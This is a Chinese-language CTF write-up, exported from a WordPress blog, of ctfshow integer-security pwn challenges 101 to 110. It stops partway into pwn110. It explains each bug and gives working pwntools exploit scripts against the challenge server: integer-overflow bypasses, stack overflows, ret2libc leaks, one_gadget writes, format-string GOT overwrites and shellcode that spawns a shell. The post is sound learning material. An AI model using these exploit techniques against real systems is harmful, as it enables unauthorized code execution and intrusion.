{"id":941,"date":"2026-02-11T17:29:27","date_gmt":"2026-02-11T09:29:27","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=941"},"modified":"2026-02-11T17:05:16","modified_gmt":"2026-02-11T09:05:16","slug":"ctfshow%e6%95%b4%e6%95%b0%e5%ae%89%e5%85%a8pwn101pwn110","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2026\/02\/11\/ctfshow%e6%95%b4%e6%95%b0%e5%ae%89%e5%85%a8pwn101pwn110\/","title":{"rendered":"ctfshow:\u6574\u6570\u5b89\u5168pwn101~pwn110"},"content":{"rendered":"\n


pwn101(\u5148\u5b66\u70b9\u4e1c\u897f\u5427)<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n


64\u4f4d\u4fdd\u62a4\u5168\u5f00<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

v4\u548cn0x7FFFFFFF\u90fd\u6709\u521d\u59cb\u503c\uff0c\u4ed6\u8bf4\u8f93\u51652\u4e2a\u6574\u6570\uff0c\u82f1\u6587\u771f\u7684\u4e00\u5f00\u59cb\u6ca1\u770b\u61c2<\/p>\n\n\n\n

(unsigned int)__isoc99_scanf(“%d %d”, &v4, &n0x7FFFFFFF) == 2<\/p>\n\n\n\n

\u8fd9\u4e00\u53e5\u5c31\u662f\u628a\u8fd4\u56de\u503c\u8f6c\u5316\u4e3a\u65e0\u7b26\u53f7\u6574\u578b\u7136\u540e\u4e0e2\u505a\u6bd4\u8f83<\/p>\n\n\n\n

\u63a5\u4e0b\u6765\u5224\u65ad\u6211\u4eec\u7684\u8f93\u5165\u662f\u5426\u7b49\u4e8e\u521d\u59cb\u503c\uff0c\u5c31\u4f1a\u6267\u884cgift()\u76f4\u63a5\u62ff\u5230flag<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n


useful\u5c31\u662f\u7ed9\u6211\u4eec\u5b66\u4e60\u7684\u4fe1\u606f<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
from pwn import *\ncontext.log_level = 'debug'\n#p=process('.\/pwn100')\np=remote('pwn.challenge.ctf.show',28260)\n\np.sendlineafter(b'Enter two integers: ',b'2147483648 2147483647')\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

pwn102(\u8fd8\u662f\u7b80\u5355\u7684\u77e5\u8bc6)<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

64\u4f4d\u4fdd\u62a4\u5168\u5f00<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5c31\u662f\u8f93\u5165v4=-1\u5c31\u53ef\u4ee5\uff0c\u6ce8\u610f\uff0c\u8f93\u5165\u7684\u662funsigned int<\/p>\n\n\n\n
\u8303\u56f4\u662f0~0xffffffff<\/p>\n\n\n\n
\u6211\u4eec\u76f4\u63a5\u8f93\u5165-1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

pwn103(\u770b\u7740\u597d\u50cf\u8fd8\u662f\u4e0d\u96be)<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u60f3\u8981\u62ff\u5230flag\u7684\u6761\u4ef6\u662f<\/p>\n\n\n\n
(unsigned __int64)dest > 0x1BF52   \/\/114514<\/code><\/pre>\n\n\n\n
\u60f3\u8981\u8fdb\u5165\u8fd9\u4e2a\u5224\u65ad\u5c31\u9700\u8981n<=80<\/p>\n\n\n\n
\u54ea\u4e2a\u82f1\u6587\u7684\u610f\u601d\u662f\u8f93\u5165\u6570\u636e\u957f\u5ea6\u6700\u591a80\u4e5f\u5c31\u662f0x50\uff0c\u53ef\u4ee5\u76f4\u63a5\u8f93\u51650x50<\/p>\n\n\n\n
\u7136\u540e\u4f1a\u8ba9\u6211\u4eec\u8f93\u5165dest<\/p>\n\n\n\n
\u4f46\u662f\u6ce8\u610f\u4e00\u4e2a\u5730\u65b9<\/p>\n\n\n\n
src = 0;\nmemcpy(dest, src, n);<\/code><\/pre>\n\n\n\n

\u8fd9\u4e2a\u51fd\u6570\u4ecesrc\u8fd9\u4e2a\u5730\u5740\u62f7\u8d1d\u4e1c\u897f\uff0c\u4f46\u662f\u8fd9\u4e2a\u5730\u5740\u4e3anull\uff0c\u4ee5\u4e3a\u5c31\u662f\u5982\u679cn!=0\u5c31\u4f1a\u63d0\u524d\u5d29\u6389<\/p>\n\n\n\n
from pwn import *\ncontext.log_level = 'debug'\n#p=process('.\/pwn100')\np=remote('pwn.challenge.ctf.show',28266)\n\np.sendlineafter(b'Enter the length of data (up to 80): ',b'0')\np.sendlineafter(b'Enter the data: ',b'0')\n#p.sendlineafter(b'Enter the data: ',b'114515')\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn104<\/h1>\n\n\n\n
\u6709\u4ec0\u4e48\u662f\u53ef\u63a7\u7684\uff1f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
64\u4f4d\u5f00\u4e86nx<\/p>\n\n\n\n
\u6211\u4eec\u770b\u5230that<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5e94\u8be5\u662f\u8981\u60f3\u529e\u6cd5\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u63a7\u5236nbytes<\/p>\n\n\n\n
\u8ba9\u5176\u7f13\u51b2\u533a\u6ea2\u51fa<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u7f13\u51b2\u533a\u6ea2\u51fa\u9700\u89810x0e+8<\/p>\n\n\n\n
from pwn import *\ncontext.log_level = 'debug'\n#p=process('.\/pwn100')\np=remote('pwn.challenge.ctf.show',28106)\n\np.sendlineafter(b'How long are you?\\n',b'30')\npayload=b'a'*(0x0e+8)+p64(0x40078D)\np.recvuntil(b'Who are you?\\n')\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn105<\/h1>\n\n\n\n
\u770b\u7740\u597d\u50cf\u6ca1\u5565\u95ee\u9898<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

32\u4f4d\u5f00\u4e86NX<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
main\u51fd\u6570\u91cc\u9762\u7684read\u521a\u597d\u628abuf\u586b\u6ee1\uff0c\u770b\u8d77\u6765\u5f88\u5371\u9669<\/p>\n\n\n\n
\u8ddf\u8fdbctfshow(buf)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5bf9\u4e8e\u8fd9\u4e2a\u51fd\u6570\u6765\u8bf4\uff0c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236s\u8ba9dest\u8d8a\u754c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6709\u540e\u95e8\u53ef\u4ee5\u8df3\u8f6c\u6267\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u4e00\u6837\u7684\u53ef\u4ee5\u5b9e\u73b0\u6808\u6ea2\u51fa\uff0c\u4f46\u662fctfshow\u91cc\u9762\u8fd8\u6709\u6761\u4ef6<\/p>\n\n\n\n
n3 = strlen(s);\nif ( n3 <= 3u || n3 > 8u )<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u8981\u7ed5\u8fc7\u8fd9\u4e2a\u6761\u4ef6\uff0c\u8fd9\u91cc\u5c31\u6709\u4e00\u4e2a\u6574\u5f62\u6ea2\u51fa<\/p>\n\n\n\n
n3\u662funsigned __int8\uff0c\u53ea\u80fd\u5b58\u516b\u4f4d\uff0c1111 1111\u5c31\u662f\u6700\u5927\u7684\u6570\u5b57\uff0c0~255\uff0c256\u662f1 0000 0000\uff0c\u4e5f\u5c31\u662fstrlen\u8fd4\u56de0\uff0c257\u8fd4\u56de1\uff0c\u6211\u4eec\u8981\u8ba9\u4ed6\u8fd4\u56de3-8\u4e4b\u95f4\u7684\u6570\uff0c\u5c31\u53ef\u4ee5\u662f256+4=260<\/p>\n\n\n\n
\u6240\u4ee5\u6211\u4eec\u7684payload\u957f\u5ea6\u8bbe\u7f6e\u62100x104<\/p>\n\n\n\n
from pwn import *\ncontext.log_level='debug'\np=remote(\"pwn.challenge.ctf.show\",28153)\n#p=process(\".\/pwn105\")\npayload=(b'a'*(0x11+4)+p32(0x804870E)).ljust\t(0x104,b'a')\np.sendlineafter(\"[+] Check your permissions:\",payload)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn106<\/h1>\n\n\n\n
\u8fd8\u662f\u975e\u5e38\u7b80\u5355<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u4e00\u6765\u5c31\u770b\u5230\u540e\u95e8\uff0c\u9700\u8981ret2<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u770b\u4e86\u770bmain\u4e3b\u8981\u8ddf\u8fdblogin(p_argc)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8ba9\u4f60\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u8fd4\u56de\u4e00\u4e2a\u6574\u6570\uff0c\u8ddf\u8fdbcheck_passwd(buf)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5176\u5b9e\u8fd9\u6b21\u6761\u4ef6\u8fd8\u662f\u6ca1\u6709\u53d8\uff0c\u6211\u4eec\u60f3\u8981\u6808\u6ea2\u51fa\u5c31\u5fc5\u987b\u901a\u8fc7<\/p>\n\n\n\n
n3 = strlen(s);\n  if ( n3 > 3u && n3 <= 8u )<\/code><\/pre>\n\n\n\n
\u4e5f\u5c31\u662fs\u7684\u5927\u5c0f\u662f0x104\u4e2a\u5b57\u7b26<\/p>\n\n\n\n
s\u5176\u5b9e\u662f\u4ecelogin()\u91cc\u9762\u6765,\u8f93\u5165\u5bc6\u7801\u7684\u65f6\u5019\u628apayload\u4f20\u8fdb\u53bb\u5c31\u884c<\/p>\n\n\n\n
read(0, buf, 0x199u);\nreturn check_passwd(buf);<\/code><\/pre>\n\n\n\n

\u6574\u6570\u6ea2\u51fa+\u6808\u6ea2\u51fa<\/p>\n\n\n\n
from pwn import *\ncontext.log_level='debug'\np=remote(\"pwn.challenge.ctf.show\",28222)\n#p=process(\".\/pwn106\")\np.sendlineafter('Your choice:',str(1))\np.sendlineafter('Please input your username:',b'faetong')\npayload=(b'a'*(0x14+4)+p32(0x8048919)).ljust\t(0x104,b'a')\np.sendlineafter(\"Please input your passwd:\",payload)\nflag=p.recvuntil('\\n')\nprint(flag)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn107<\/h1>\n\n\n\n
\u7c7b\u578b\u8f6c\u6362<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6ca1\u6709\u627e\u5230\u540e\u95e8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u4f1a\u7ecf\u8fc7\u4e00\u4e2agetch(nptr, 4)\u8ba9\u6211\u4eec\u8f93\u5165\u5b57\u7b26\uff0c\u7136\u540e\u7528atoi()\u8fdb\u884c\u8f6c\u6362<\/p>\n\n\n\n
\u8ddf\u8fdbgetch<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8fd9\u4e2afor\u5faa\u73af\u672c\u8eab\u6ca1\u6709\u9000\u51fa\u6761\u4ef6\uff0c\u5faa\u73af\u4f53\u5185\u90e8\u7684\u5224\u65ad\u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n
!char || char == 10 || i >= n4<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u8f93\u5165\u7684\uff1fchar\u6ee1\u8db3\u5176\u4e2d\u4e00\u4e2a\u6761\u4ef6\u6216\u8005i>=n4,n4\u662f4\uff0c\u4e5f\u5c31\u662f\u5faa\u73af\u5230\u7b2c5\u6b21<\/p>\n\n\n\n
\u51fd\u6570\u6700\u540e\u8fd4\u56de\u7684\u662fnptr[i]\u7684\u5730\u5740\uff0c\u5982\u679c\u7b2c\u4e00\u6b21\u5c31\u8df3\u51fa\u5faa\u73af\uff0cnptr[0] = 0<\/p>\n\n\n\n
\u4f46\u662f\u4ed4\u7ec6\u89c2\u5bdf\u6709\u4e00\u4e2a\u5f88\u5947\u602a\u7684\u5730\u65b9\uff0cmain\u51fd\u6570\u4e2d\u7684n4\u662fint\u7c7b\u578b\u7684\u53d8\u91cf\u800cgetch\u51fd\u6570\u91cc\u9762n4\u662funsigned int\uff0c<\/p>\n\n\n\n
\u6ce8\u610f\u770b\u5230show\u51fd\u6570\u4e0b\u9762\u8fd8\u6709\u4e00\u4e2aif<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6211\u4eec\u80af\u5b9a\u662f\u8981\u7a0b\u5e8f\u7ee7\u7eed\u6267\u884c\uff0c\u6240\u4ee5n4<=32\uff0c\u5c31\u662fatoi(nptr)<=32<\/p>\n\n\n\n
\u7a0b\u5e8f\u4f1a\u518d\u6b21getch(nptr, n4);<\/p>\n\n\n\n
\u6b64\u65f6n4\u7ecf\u5386\u4e86\u7c7b\u578b\u8f6c\u6362\uff0c\u6211\u4eec\u5982\u679c\u4e00\u5f00\u59cb\u8f93\u5165\u8d1f\u6570\u5c31\u53ef\u4ee5\u9020\u6210\u6574\u6570\u6ea2\u51fa\u7ed5\u8fc7\u957f\u5ea6\u9650\u5236<\/p>\n\n\n\n
\u8bd5\u8bd5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u679c\u7136\u662f\u7ed5\u8fc7\u6765\u4e86\uff0c\u63a5\u4e0b\u6765\u6211\u4eec\u53ef\u4ee5re2libc\u4e86\uff0c\u5229\u7528printf\u6765\u6cc4\u9732libc<\/p>\n\n\n\n
\u504f\u79fb\u662f0x2c+4<\/p>\n\n\n\n
from pwn import *\nfrom LibcSearcher import LibcSearcher\ncontext.log_level='debug'\np=remote(\"pwn.challenge.ctf.show\", 28222)\n#p=process(\".\/pwn107\")\ne=ELF(\".\/pwn107\")\nprintf_got=e.got['printf']\nprintf_plt=e.plt['printf']\nshow_addr=e.symbols['show']\n\npayload=b'a'*(0x2c+4)+p32(printf_plt)+p32(show_addr)+p32(printf_got)\np.sendlineafter(\"read? \",b'-1')\np.sendline(payload)\nprintf_leak=u32(p.recvuntil('\\xf7')[-4:])\nprint(f'leak={hex(printf_leak)}')\nlibc=LibcSearcher(\"printf\",printf_leak)\nbase=printf_leak-libc.dump(\"printf\")\nsystem=base+libc.dump(\"system\")\nbinsh=base+libc.dump(\"str_bin_sh\")\npayload2=b'a'*(0x2c+4)+p32(system)+p32(show_addr)+p32(binsh)\np.sendlineafter(\"read? \",b'-1')\np.sendline(payload2)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn108<\/h1>\n\n\n\n
\u5b66\u7d2f\u4e86\u5427\uff0c\u6765\u73a9\u4e2a\u6e38\u620f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u4fdd\u62a4\u5168\u5f00\uff0c\u73a9\u4e2a\u6bdb\u7ebf\u6e38\u620f<\/p>\n\n\n\n
__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n  int i; \/\/ [rsp+8h] [rbp-28h]\n  int j; \/\/ [rsp+Ch] [rbp-24h]\n  __int64 v6; \/\/ [rsp+10h] [rbp-20h]\n  _BYTE v7[3]; \/\/ [rsp+25h] [rbp-Bh] BYREF\n  unsigned __int64 v8; \/\/ [rsp+28h] [rbp-8h]\n\n  v8 = __readfsqword(0x28u);\n  sub_9BA();\n  sub_A55(a1, a2);\n  puts(\"Free shooting games! Three bullets available!\");\n  printf(\"I placed the target near: %p\\n\", &puts);\n  puts(\"shoot!shoot!\");\n  v6 = sub_B78();\n  for ( i = 0; i <= 2; ++i )\n  {\n    puts(\"biang!\");\n    read(0, &v7[i], 1u);\n    getchar();\n  }\n  if ( (unsigned int)sub_BC2(v7) )\n  {\n    for ( j = 0; j <= 2; ++j )\n      *(_BYTE *)(j + v6) = v7[j];\n  }\n  if ( !dlopen(0, 1) )\n    exit(1);\n  puts(\"bye~\");\n  return 0;\n}<\/code><\/pre>\n\n\n\n

\u8ba9\u4eba\u770b\u7740\u5f88\u70e6\u7684main\u51fd\u6570<\/p>\n\n\n\n
printf(\"I placed the target near: %p\\n\", &puts);<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u76f4\u63a5\u6cc4\u9732\u4e86puts\u7684\u771f\u5b9e\u5730\u5740\uff0c\u6cc4\u9732libc<\/p>\n\n\n\n
\u6211\u4eec\u8ddf\u8fdbv6 = sub_B78();<\/p>\n\n\n\n
__int64 sub_B78()\n{\n  char nptr[24]; \/\/ [rsp+0h] [rbp-20h] BYREF\n  unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n  v2 = __readfsqword(0x28u);\n  sub_AE3(nptr, 16);\n  return atol(nptr);\n}\n\n\nunsigned __int64 __fastcall sub_AE3(char *nptr, int n16)\n{\n  int i; \/\/ [rsp+18h] [rbp-18h]\n  unsigned __int64 v5; \/\/ [rsp+28h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  for ( i = 0; i < n16; ++i )\n  {\n    if ( (unsigned int)read(0, nptr, 1u) == -1 )\n      exit(1);\n    if ( *nptr == 10 )\n      break;\n    ++nptr;\n  }\n  return __readfsqword(0x28u) ^ v5;\n}\n<\/code><\/pre>\n\n\n\n
\u5c31\u662f\u53ef\u4ee5\u5411nptr\u4e2d\u8f93\u5165\u4e00\u4e2a\u5730\u5740<\/p>\n\n\n\n
\u76f4\u63a5\u5173\u7cfb\u5230\u7684\u662fmain\u4e2d\u8fd9\u4e00\u6bb5\u4ee3\u7801<\/p>\n\n\n\n
if ( (unsigned int)sub_BC2(v7) )\n  {\n    for ( j = 0; j <= 2; ++j )\n      *(_BYTE *)(j + v6) = v7[j];\n  }<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u4fee\u65393\u4e2a\u5b57\u8282<\/p>\n\n\n\n
\u6211\u4eec\u8ddf\u8fdbsub_BC2\uff0c\u53d1\u73b0\u6709\u4e00\u4e9b\u4e1c\u897f\u4e0d\u80fd\u5199\u5165<\/p>\n\n\n\n
\u7981\u6b62\u5199\u5165 \u5f53\uff1a\n  (a1[0] == 0xC5 && a1[1] == 0xF2)\n|| (a1[0] == 0x22 && a1[1] == 0xF3)\n|| (a1[0] == 0x8C)\n|| (a1[1] == 0xA3)\n<\/code><\/pre>\n\n\n\n
\u7ed3\u5408main\u4e2d\u7684\u4ee3\u7801\uff0c\u610f\u601d\u662f\u53ea\u68c0\u67e5\u4e86\u524d\u4e24\u4e2a\u5b57\u8282<\/p>\n\n\n\n
\u5176\u5b9e\u524d\u9762\u7684\u4e1c\u897f\u6bd4\u8f83\u6e05\u695a\uff0c\u6211\u4eec\u80fd\u591f\u63a7\u5236v6\uff0cv7[j],\u800c\u4e14\u8fd8\u6709libc\u53ef\u4ee5\u6cc4\u9732\uff0c\u5b8c\u5168\u53ef\u4ee5\u505a\u5230\u5730\u5740\u4efb\u610f\u5199\uff0c\u5c31\u662f\u6700\u540e\u90a3\u4e2a\u9650\u5236\u6709\u70b9\u61f5<\/p>\n\n\n\n
\u5176\u5b9e\u662f\u9650\u5236\u7684gadget\uff0c\u6211\u4eec\u786e\u5b9e\u53ef\u4ee5\u50cfwp\u91cc\u9762\u7528gadget-5\u6765\u7ed5\u8fc7\uff0c\u5b83\u4f1a\u7ee7\u7eed\u6267\u884c<\/p>\n\n\n\n
\u4f46\u662f\u5173\u4e8eexit hook\u90a3\u4e00\u5927\u4e32\u8c03\u7528\u94fe\u6211\u662f\u771f\u7684\u770b\u4e0d\u61c2TAT<\/p>\n\n\n\n
\u4e0b\u9762\u5c31\u662fglibc\u5728\u5904\u7406\u7684\u771f\u5b9e\u94fe\u5b50<\/p>\n\n\n\n
exit\n \u2514\u2500 glibc\/stdlib\/exit.c\n     \u2514\u2500 __run_exit_handlers\n         \u2514\u2500 _dl_fini\n             \u2514\u2500 call [_dl_rtld_lock_recursive]\n<\/code><\/pre>\n\n\n\n

1\u3001leak<\/h3>\n\n\n\n
from pwn import *\nfrom LibcSearcher import LibcSearcher\ncontext.log_level='debug'\np=remote(\"pwn.challenge.ctf.show\", 28211)\n#p=process(\".\/pwn107\")\ne=ELF(\".\/pwn108\")\n\np.recvuntil(\"0x\")\nputs_leak=int(p.recvuntil('\\n'),16)\nprint(f'puts_leak={hex(puts_leak)}')<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
0x4f29e execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  address rsp+0x50 is writable\n  rsp & 0xf == 0\n  rcx == NULL || {rcx, \"-c\", r12, NULL} is a valid argv\n\n0x4f2a5 execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  address rsp+0x50 is writable\n  rsp & 0xf == 0\n  rcx == NULL || {rcx, rax, r12, NULL} is a valid argv\n\n0x4f302 execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  [rsp+0x40] == NULL || {[rsp+0x40], [rsp+0x48], [rsp+0x50], [rsp+0x58], ...} is a valid argv\n\n0x10a2fc execve(\"\/bin\/sh\", rsp+0x70, environ)\nconstraints:\n  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv\n<\/code><\/pre>\n\n\n\n

\u4f46\u662f\u771f\u7684\u4e0d\u592a\u4e00\u6837\u554a\uff0c\u5c31\u7528wp\u91cc\u9762\u7684\u5148\u8dd1\u4e2aflag\u5427<\/p>\n\n\n\n

2\u3001give up\u4e86<\/h3>\n\n\n\n
from pwn import *\ncontext(arch='amd64',os='linux',log_level='debug')\n#io = process('.\/pwn')\nio = remote('pwn.challenge.ctf.show',28294)\nelf = ELF('.\/pwn108')\nlibc = ELF('\/home\/faetong\/glibc-all-in-one\/libs\/2.27-3ubuntu1.5_amd64\/libc-2.27.so')\nio.recvuntil('0x')\nputs_addr = int(io.recv(12),16)\nlibc_base = puts_addr - libc.sym['puts']\nstrlen = libc_base + 0x3eb0a8\nsss = str(strlen)\nio.sendline(sss)\none_gadget = libc_base + 0xe54fe\nfor _ in range(3):\n\tio.sendlineafter(\"biang!\\n\", chr(one_gadget & 0xff))\n\tone_gadget = one_gadget >> 8\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5b9e\u662f2.27\u7684libc\uff0c\u53ef\u4ee5\u7528glibc_all_in_one\u4e0b\u8f7d<\/p>\n\n\n\n

pwn109<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

ida\u6253\u5f00\u6709\u70b9\u5c0f\u4e71\uff0c\u627e\u627emain<\/p>\n\n\n\n
int __cdecl sub_90B(int a1)\n{\n  int p_n2; \/\/ [esp+0h] [ebp-40Ch] BYREF\n  char buf[1024]; \/\/ [esp+4h] [ebp-408h] BYREF\n  int *v4; \/\/ [esp+404h] [ebp-8h]\n\n  v4 = &a1;\n  sub_73B();\n  sub_7A2();\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      puts(\"What you want to do?\\n1) Input someing!\\n2) Hang out!!\\n3) Quit!!!\");\n      __isoc99_scanf(\"%d\", &p_n2);\n      getchar();\n      if ( p_n2 != 2 )\n        break;\n      sub_8E4(buf);\n    }\n    if ( p_n2 == 3 )\n      break;\n    if ( p_n2 == 1 )\n      sub_8A4(buf, 0x400u);\n    else\n      printf(\"What do you mean by %d\", p_n2);\n  }\n  puts(\"See you~\");\n  return 0;\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u5e94\u8be5\u5c31\u662fmain\u51fd\u6570<\/p>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a\u83dc\u5355<\/p>\n\n\n\n
\u8ddf\u8fdb\u8f93\u5165\u4e00\u7684sub_8A4(buf, 1024u)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5148\u6253\u5370\u4e86buf\u7684\u5730\u5740\uff0c\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u8f93\u51651024\u5b57\u8282\uff0c\u597d\u50cf\u521a\u597d\u586b\u6ee1buf<\/p>\n\n\n\n
\u8ddf\u8fdb\u8f93\u51652\u7684printf_w(buf)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8c03\u7528\u4e86printf\uff0c\u597d\u50cf\u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u6211\u4eec\u53ef\u4ee5\u8bd5\u8bd5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u786e\u5b9e\u53ef\u4ee5\uff0c\u504f\u79fb\u662f16<\/p>\n\n\n\n

1\u3001\u83dc\u9e21\u7684\u505a\u6cd5\u5931\u8d25\u4e86<\/h3>\n\n\n\n
\u8fd9\u6837\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6f0f\u6d1e\u5c06printf_got\u66ff\u6362\u4e3asystem<\/p>\n\n\n\n
\u9996\u5148\u6cc4\u9732libc<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5e94\u8be5\u4e5f\u662f2.27<\/p>\n\n\n\n
\u8bd5\u4e86\u4e00\u4e0b\uff0c\u6ca1\u6709\u6253\u901a\uff0c\u8fd8\u662f\u628a\u811a\u672c\u653e\u51fa\u6765\u662f\u5e08\u5085\u4eec\u6307\u70b9\u4e00\u4e8c\uff08\u6211\u771f\u83dc\uff09<\/p>\n\n\n\n
from pwn import *\nfrom LibcSearcher import LibcSearcher\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn109')\np = remote('pwn.challenge.ctf.show',28256)\nelf = ELF('.\/pwn109')\nlibc=ELF(\"\/home\/faetong\/glibc-all-in-one\/libs\/2.27-3ubuntu1.6_i386\/libc-2.27.so\")\nprintf_got=elf.got[\"printf\"]\npayload1=p32(printf_got)+b'%16$s'\np.sendlineafter(\"3) Quit!!!\\n\",str(1))\np.recvline()\np.sendline(payload1)\np.sendlineafter(\"3) Quit!!!\\n\",str(2))\nprintf_leak=u32(p.recv(4))\nprint(f'printf_leak={hex(printf_leak)}')\n#libc=LibcSearcher(\"printf\",printf_leak)\n#base=printf_leak-libc.dump(\"printf\")\n#system=base+libc.dump(\"system\")\nbase=printf_leak-libc.symbols[\"printf\"]\nsystem=base+libc.symbols[\"system\"]\npayload2=fmtstr_payload(27,{printf_got:system})\np.sendlineafter(\"3) Quit!!!\\n\",str(1))\np.recvline()\np.sendline(payload2)\np.sendlineafter(\"3) Quit!!!\\n\",str(1))\np.recvline()\np.sendline(b'\/bin\/sh\\x00')\np.sendlineafter(\"3) Quit!!!\\n\",str(2))\np.interactive()\n<\/code><\/pre>\n\n\n\n

2\u3001shellcode<\/h3>\n\n\n\n

\u8fd9\u4e2a\u7684\u8bdd\u5176\u5b9e\u66f4\u7b80\u5355\uff0c\u5c31\u662f\u76f4\u63a5\u5728\u6808\u4e0a\u5199\u597dshellcode\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u628amian\u51fd\u6570\u7684\u5730\u5740\u6539\u6210\u6808\u5730\u5740\uff0c\u6211\u597d\u8822TAT<\/p>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn109')\np = remote('pwn.challenge.ctf.show',28256)\nelf = ELF('.\/pwn109')\nshellcode=asm(shellcraft.sh())\nprintf_got=elf.got['printf']\np.sendlineafter(\"3) Quit!!!\\n\",str(1))\nbuf_leak=int(p.recvuntil(b\"\\n\").strip(), 16)\nret=buf_leak+0x41c\npayload1=fmtstr_payload(16,{ret:buf_leak})\np.sendline(payload1)\n\np.sendlineafter(\"3) Quit!!!\\n\",str(2))\np.sendlineafter(\"3) Quit!!!\\n\",str(1))\np.recvline()\np.sendline(shellcode)\np.sendlineafter(\"3) Quit!!!\\n\",str(3))\np.interactive()\n\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8fd90x41c\u6211\u4e5f\u4e0d\u77e5\u9053\u600e\u4e48\u6765\u7684<\/p>\n\n\n\n
pwn110<\/h1>\n\n\n\n
\u6ea2\u51fa\u6ea2\u51fa\u6ea2\u51fa<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5565\u90fd\u6ca1\u6709\u5f00\uff0c\u6ca1\u6709system\u548c\/bin\/sh<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u50cf\u662f\u6709\u4e00\u4e2a\u8f93\u5165\u548c\u5faa\u73af\u8f93\u51fa<\/p>\n\n\n\n
\u8ddf\u8fdbinput\u51fd\u6570<\/p>\n\n\n\n
